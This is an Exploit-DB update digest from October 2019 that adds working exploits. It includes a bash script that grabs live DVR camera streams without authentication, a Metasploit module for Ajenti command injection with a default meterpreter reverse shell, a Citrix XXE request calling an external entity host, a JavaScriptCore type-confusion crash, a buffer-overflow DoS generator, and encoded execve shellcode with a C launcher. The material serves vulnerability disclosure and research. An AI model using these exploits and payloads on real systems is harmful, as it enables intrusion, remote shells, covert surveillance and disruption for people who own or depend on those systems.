DB: 2019-10-31

6 changes to exploits/shellcodes

WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service
JavaScriptCore - GetterSetter Type Confusion During DFG Compilation
Ajenti 2.1.31 - Remote Code Exection (Metasploit)
Citrix StoreFront Server 7.15 - XML External Entity Injection
iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure

Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)

exploits/hardware/webapps/47562.sh

@@ -0,0 +1,67 @@
+# Title: iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure
+# Date: 2019-10-29
+# Author: LiquidWorm
+# Vendor:iSeeQ
+# Link: http://www.iseeq.co.kr
+# CVE: N/A
+
+#!/bin/bash
+#
+#
+# iSeeQ Hybrid DVR WH-H4 1.03R / 2.0.0.P (get_jpeg) Stream Disclosure
+#
+#
+# Vendor: iSeeQ
+# Product web page: http://www.iseeq.co.kr
+# Affected version: WH-H4 1.03R / 2.0.0.P
+#
+# Summary: The 4/8/16 channel hybrid standalone DVR delivers high quality
+# pictures which adopts high performance video processing chips and embedded
+# Linux system. This advanced video digital platform is very useful to identify
+# an object from a long distance.
+#
+# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
+# disclosure when get_jpeg script is called.
+#
+# Tested on: Boa/0.94.13
+#            PHP/7.0.22
+#            DVR Web Server
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5539
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5539.php
+#
+#
+# 28.10.2019
+#
+
+
+if [ "$#" -ne 2 ]; then
+    echo "Usage: $0 IP:PORT CHANNEL"
+    exit
+fi
+IP=$1
+CHANNEL=$2
+HOST="http://$IP/cgi-bin/get_jpeg?ch=$CHANNEL"
+STATUS=$(curl -Is http://$IP/cgi-bin/php/login.php 2>/dev/null | head -1 | awk -F" " '{print $2}')
+if [ "$STATUS" == "404" ]; then
+    echo "Target not vulnerable!"
+    exit
+fi
+echo "Collecting snapshots..."
+for x in {1..10};
+    do echo -ne $x
+    curl "$HOST" -o seq-$x.jpg -#;
+    sleep 0.8
+    done
+echo -ne "\nDone."
+echo -ne "\nRendering video..."
+ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i seq-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p clip.mp4
+echo " done."
+echo -ne "\nRunning animation..."
+sleep 1
+cvlc clip.mp4 --verbose -1 -f vlc://quit

exploits/json/webapps/47560.rb

@@ -0,0 +1,85 @@
+# Exploit Title: Ajenti 2.1.31 - Remote Code Exection (Metasploit)
+# Date: 2019-10-29
+# Exploit Author: Onur ER
+# Vendor Homepage: http://ajenti.org/
+# Software Link: https://github.com/ajenti/ajenti
+# Version: 2.1.31
+# Tested on: Ubuntu 19.10
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'            => "Ajenti 2.1.31 Remote Code Execution",
+                      'Description'     => %q{
+                        This module exploits a command injection in Ajenti <= 2.1.31.
+                        By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
+                      },
+                      'Author'          => [
+                          'Jeremy Brown', # Vulnerability discovery
+                          'Onur ER <onur@onurer.net>' # Metasploit module
+                      ],
+                      'References'      => [
+                          ['EDB', '47497']
+                      ],
+                      'DisclosureDate'  => '2019-10-14',
+                      'License'         => MSF_LICENSE,
+                      'Platform'        => 'python',
+                      'Arch'            => ARCH_PYTHON,
+                      'Privileged'      => false,
+                      'Targets'         => [
+                          [ 'Ajenti <= 2.1.31', {} ]
+                      ],
+                      'DefaultOptions'  =>
+                          {
+                              'RPORT'   => 8000,
+                              'SSL'     => 'True',
+                              'payload' => 'python/meterpreter/reverse_tcp'
+                          },
+                      'DefaultTarget'   => 0
+          ))
+    register_options([
+                         OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+                               'method' => 'GET',
+                               'uri'    => "/view/login/normal"
+                           })
+    if res and res.code == 200
+      if res.body =~ /'ajentiVersion', '2.1.31'/
+        return Exploit::CheckCode::Vulnerable
+      elsif res.body =~ /Ajenti/
+        return Exploit::CheckCode::Detected
+      end
+    end
+    vprint_error("Unable to determine due to a HTTP connection timeout")
+    return Exploit::CheckCode::Unknown
+  end
+
+
+  def exploit
+    print_status("Exploiting...")
+    random_password = rand_text_alpha_lower(7)
+    json_body = { 'username' => "`python -c \"#{payload.encoded}\"`",
+                  'password' => random_password,
+                  'mode' => 'normal'
+    }
+    res = send_request_cgi({
+         'method' => 'POST',
+         'uri'    => normalize_uri(target_uri, 'api', 'core', 'auth'),
+         'ctype'  => 'application/json',
+         'data'   => JSON.generate(json_body)
+     })
+  end
+end

exploits/multiple/dos/47565.txt

@@ -0,0 +1,102 @@
+The following JavaScript program, found by Fuzzilli and slightly modified, crashes JavaScriptCore built from HEAD and the current stable release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc):
+
+    let notAGetterSetter = {whatever: 42};
+
+    function v2(v5) {
+        const v10 = Object();
+        if (v5) {
+            const v12 = {set:Array};
+            const v14 = Object.defineProperty(v10,"length",v12);
+            const v15 = (140899729)[140899729];
+        } else {
+            v10.length = notAGetterSetter;
+        }
+        const v18 = new Uint8ClampedArray(49415);
+        v18[1] = v10;
+        const v19 = v10.length;
+        let v20 = 0;
+        while (v20 < 100000) {
+            v20++;
+        }
+    }
+    const v26 = v2();
+    for (let v32 = 0; v32 < 1000; v32++) {
+        const v33 = v2(true);
+    }
+
+    /*
+    Crashes with:
+    ASSERTION FAILED: from.isCell() && from.asCell()->JSCell::inherits(*from.asCell()->vm(), std::remove_pointer<To>::type::info())
+    ../../Source/JavaScriptCore/runtime/JSCast.h(44) : To JSC::jsCast(JSC::JSValue) [To = JSC::GetterSetter *]
+    1   0x1111ada79 WTFCrash
+    2   0x1111ada99 WTFCrashWithSecurityImplication
+    3   0x10ffb8f55 JSC::GetterSetter* JSC::jsCast<JSC::GetterSetter*>(JSC::JSValue)
+    4   0x10ffaf820 JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::executeEffects(unsigned int, JSC::DFG::Node*)
+    5   0x10ff9f37b JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::execute(unsigned int)
+    6   0x10ff9def2 JSC::DFG::CFAPhase::performBlockCFA(JSC::DFG::BasicBlock*)
+    7   0x10ff9d957 JSC::DFG::CFAPhase::performForwardCFA()
+    8   0x10ff9d647 JSC::DFG::CFAPhase::run()
+    9   0x10ff9cc61 bool JSC::DFG::runAndLog<JSC::DFG::CFAPhase>(JSC::DFG::CFAPhase&)
+    10  0x10ff6c65b bool JSC::DFG::runPhase<JSC::DFG::CFAPhase>(JSC::DFG::Graph&)
+    11  0x10ff6c625 JSC::DFG::performCFA(JSC::DFG::Graph&)
+    12  0x110279031 JSC::DFG::Plan::compileInThreadImpl()
+    13  0x110274fa6 JSC::DFG::Plan::compileInThread(JSC::DFG::ThreadData*)
+    14  0x11052a9bb JSC::DFG::Worklist::ThreadBody::work()
+    15  0x1111b3c69 WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0::operator()() const
+    16  0x1111b38a9 WTF::Detail::CallableWrapper<WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0, void>::call()
+    17  0x1102c433a WTF::Function<void ()>::operator()() const
+    18  0x1111f0350 WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*)
+    19  0x111285525 WTF::wtfThreadEntryPoint(void*)
+    20  0x7fff5a7262eb _pthread_body
+    21  0x7fff5a729249 _pthread_start
+    22  0x7fff5a72540d thread_start
+    */
+
+The assertion indicates that a JSCell is incorrectly downcasted to a GetterSetter [1] (a pseudo object used to implement property getters/setter). In non debug builds, a type confusion then follows.
+
+Below is my preliminary analysis of the cause of the bug.
+
+The function v2 is eventually JIT compiled by the FTL JIT compiler. Initially, it will create the following (pseudo) DFG IR for it:
+
+# Block 0 (before if-else):
+  44: NewObject(...)
+  <jump to block 1 or 2 depending on v5>
+
+# Block 1 (the if part):
+  ... <install .length property on @44>
+  // Code for const v15 = (140899729)[140899729];
+  ForceOSRExit
+  Unreachable
+
+# Block 2 (the else part)
+  PutByOffset @44, notAGetterSetter
+  PutStructure
+
+# Block 3 (after the if-else):
+  ...
+  // Code for v10.length. Due to feedback from previous executions, DFG
+  // JIT speculates that the if branch will be taken and that it will see
+  // v10 with a GetterSetter for .length here
+  CheckStructure @44, structureWithLengthBeingAGetterSetter
+  166: GetGetterSetterByOffset @44, .length         // Load the GetterSetter object from @44
+  167: GetGetter @166                               // Load the getter function from the GetterSetter
+  ...
+
+
+Here, the end of block 1 has already been marked as unreachable due to the element load from a number which will always cause a bailout.
+
+Later, the global subexpression elimination phase [2] runs and does the following (which can be seen by enabling verbose CSE [3]):
+
+* It determines that the GetGetterSetterByOffset node loads the named property from the object @44
+* It determines that this property slot is assigned in block 2 (the else block) and that this block strictly dominates the current block (meaning that the current block can only be reached through block 2)
+    * This is now the case as block 1 does a bailout, so block 3 can never be reached from block 1
+* As such, CSE replaces the GetGetterSetterByOffset operation with the constant for |notAGetterSetter| (as that is what is assigned in block 2).
+
+At this point the IR is incorrect as the input to a GetGetter operation is expected to be a GetterSetter object, but in this case it is not. During later optimizations, e.g. the AbstractInterpreter relies on that invariant and casts the input to a GetterSetter object [4]. At that point JSC crashes in debug builds with the above assertion. It might also be possible to trigger the type confusion at runtime instead of at compile time but I have not attempted that.
+
+
+
+[1] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/runtime/GetterSetter.h#L43
+[2] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.h#L49
+[3] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.cpp#L51
+[4] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L2811

exploits/windows/dos/47563.py

@@ -0,0 +1,28 @@
+# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service
+# Date: 2019-10-30
+# Vendor Homepage:https://www.alloksoft.com/
+# Software Link:  https://www.alloksoft.com/wmv.htm
+# Exploit Author: Nithoshitha S
+# Tested Version: v4.6.1217
+# Tested on: Windows 7 x64
+#            Windows XP SP3
+
+# 1.- Run python code :poc.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open  WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey'
+# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
+# 5.- Click 'OK' and you will see a crash.
+
+# poc.py
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+f=open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"

exploits/xml/webapps/47561.txt

@@ -0,0 +1,35 @@
+# Exploit Title: Citrix StoreFront Server 7.15 - XML External Entity Injection
+# Date: 2019-08-28
+# Exploit Author: Vahagn Vardanya
+# Vendor Homepage:https://www.citrix.com/downloads/storefront/
+# Software Link: https://support.citrix.com/article/CTX251988
+# Version:
+# Citrix StoreFront Server  earlier than 1903
+# Citrix StoreFront Server 7.15 LTSR earlier than CU4 (3.12.4000)
+# Citrix StoreFront Server 7.6 LTSR earlier than CU8 (3.0.8000)#
+# Tested on: Windows
+# Shodan query https://www.shodan.io/search?query=%2FCitrix%2FStoreWeb
+
+# PoC
+
+POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1
+Content-Type: application/vnd.citrix.requesttoken+xml
+Accept: application/vnd.citrix.requesttokenresponse+xml, application/vnd.
+citrix.authenticateresponse-1+xml
+Accept-Language:ru,en-US;q=0.9,en;q=0.8,fr;q=0.7,hy;q=0.6,de;q=0.5,es;q=0.4,nb;q=0.3,nl;q=0.2,fi;q=0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
+X-Forwarded-For: 192.168.204.1
+X-Citrix-Agent: crm.
+X-Citrix-AM-CredentialTypes: none, username, domain, password, newpassword,passcode, savecredentials, textcredential, webview, webview
+X-Citrix-AM-LabelTypes: none, plain, heading, information, warning, error,confirmation, image
+X-Citrix-IsUsingHTTPS: No
+Host: 192.168.204.131
+Content-Length: 331
+Expect: 100-continue
+
+<?xml version="1.0" encoding="utf-8" standalone='no'?><!DOCTYPE
+requesttoken [<!ENTITY % xxe SYSTEM "http://REMOTE">%xxe; ]><requesttoken
+xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken
+"><for-service>a</for-service><for-service-url>http://secure-web.cisco.com/
+<http://secure-web.cisco.com/1ijL9Cycthe9FsmytQkHCl1Xg9pMufEcuz0PmzFHVwkbFjSep42bW3GRBkLUxePJTdOcYeHl5hlVi95aQc-F0KUuqpBKFdx4EXJ_ppx3MY000cALA2hGugGjMX3hbmvhtPOTba7B4LnAcpuyFDLHiSlv8xyu_CzN0mhekRY51L34p4Wy9oMguR9Bj8YWAm6KxixMl1DiaZ88h4FVR0vKzHdtedNF63xO329dQAtQuVWiipK_rt4rnVWKmorTTrbp-bsdV7zUBsqjON-MZYpzagQ/http%3A%2F%2F192.168.204.146%2FCitrix%2Fstore_nameAuth%2Fauth%2Fv1%2Ftoken></for-service-url><reqtokentemplate
+/><requested-lifetime>0.08:00:00</requested-lifetime></requesttoken>

files_exploits.csv

@@ -6582,6 +6582,8 @@ id,file,description,date,author,type,platform,port
 47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows,
 47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows,
 47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple,
+47563,exploits/windows/dos/47563.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service",2019-10-30,"Nithoshitha S",dos,windows,
+47565,exploits/multiple/dos/47565.txt,"JavaScriptCore - GetterSetter Type Confusion During DFG Compilation",2019-10-30,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41878,3 +41880,6 @@ id,file,description,date,author,type,platform,port
 47553,exploits/php/webapps/47553.md,"PHP-FPM + Nginx - Remote Code Execution",2019-10-28,"Emil Lerner",webapps,php,
 47555,exploits/php/webapps/47555.py,"rConfig 3.9.2 - Remote Code Execution",2019-10-29,Askar,webapps,php,
 47557,exploits/php/webapps/47557.txt,"Wordpress 5.2.4 - Cross-Origin Resource Sharing",2019-10-29,"Milad Khoshdel",webapps,php,
+47560,exploits/json/webapps/47560.rb,"Ajenti 2.1.31 - Remote Code Exection (Metasploit)",2019-10-30,"Onur ER",webapps,json,
+47561,exploits/xml/webapps/47561.txt,"Citrix StoreFront Server 7.15 - XML External Entity Injection",2019-10-30,"Vahagn Vardanyan",webapps,xml,
+47562,exploits/hardware/webapps/47562.sh,"iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure",2019-10-30,LiquidWorm,webapps,hardware,

files_shellcodes.csv

@@ -1008,3 +1008,4 @@ id,file,description,date,author,type,platform
 47513,shellcodes/linux/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux
 47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux
 47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux
+47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux

shellcodes/linux/47564.py

@@ -0,0 +1,133 @@
+# Title: Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
+# Author: Daniel Ortiz
+# Date: 2019-10-30
+# Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+# Size: 47 bytes
+# SLAE ID: PA-9844
+
+#----------------------- execve ------------------------------------------------#
+
+global _start
+
+section .text
+
+_start:
+
+        xor eax, eax
+        push eax
+
+        ; PUSH //bin/sh (8 bytes) 
+
+        push 0x68732f2f
+        push 0x6e69622f
+        mov ebx, esp
+
+        push eax
+        mov edx, esp
+
+        push ebx
+        mov ecx, esp
+
+        mov al, 11
+        int 0x80
+
+#------------------------ execve shellcode -------------------------------------#
+
+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
+
+#----------------------- Python Encoder ----------------------------------------#
+
+#!/usr/bin/python
+
+shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
+
+encoded = ""
+encoded2 = ""
+
+rot = 8
+
+print 'Encoded shellcode ...'
+
+for x in bytearray(shellcode) :
+        # NOT encoding 
+        y = ~x
+        
+        # ROT 8 encoding
+        h  = (y + rot)%256
+
+        encoded += '\\x'
+        encoded += '%02x' % (h & 0xff)
+
+        encoded2 += '0x'
+        encoded2 += '%02x,' %(h & 0xff)
+
+
+print encoded
+
+print encoded2
+
+print 'Len: %d' % len(bytearray(shellcode))
+
+#---------------------- Assembly Code ------------------------------------------#
+
+
+global _start
+
+section .text
+_start:
+        jmp short call_shellcode
+
+decoder:
+        pop esi
+        xor ecx, ecx
+        mov cl, 25
+
+
+decode:
+
+        sub byte [esi], 8
+        not byte [esi]
+        inc esi
+        loop decode
+
+        jmp short EncodedShellcode
+
+call_shellcode:
+
+        call decoder
+
+        EncodedShellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] = 
+
+
+"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe"
+"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff"
+"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a"
+"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8"
+"\x13\x88";
+
+#------------------------- C wrapper --------------------------------------------------# 
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+
+"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe"
+"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff"
+"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a"
+"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8"
+"\x13\x88";
+
+
+int main()
+{
+
+        printf("Shellcode Length:  %d\n", strlen(code));
+        int (*ret)() = (int(*)())code;
+        ret();
+
+}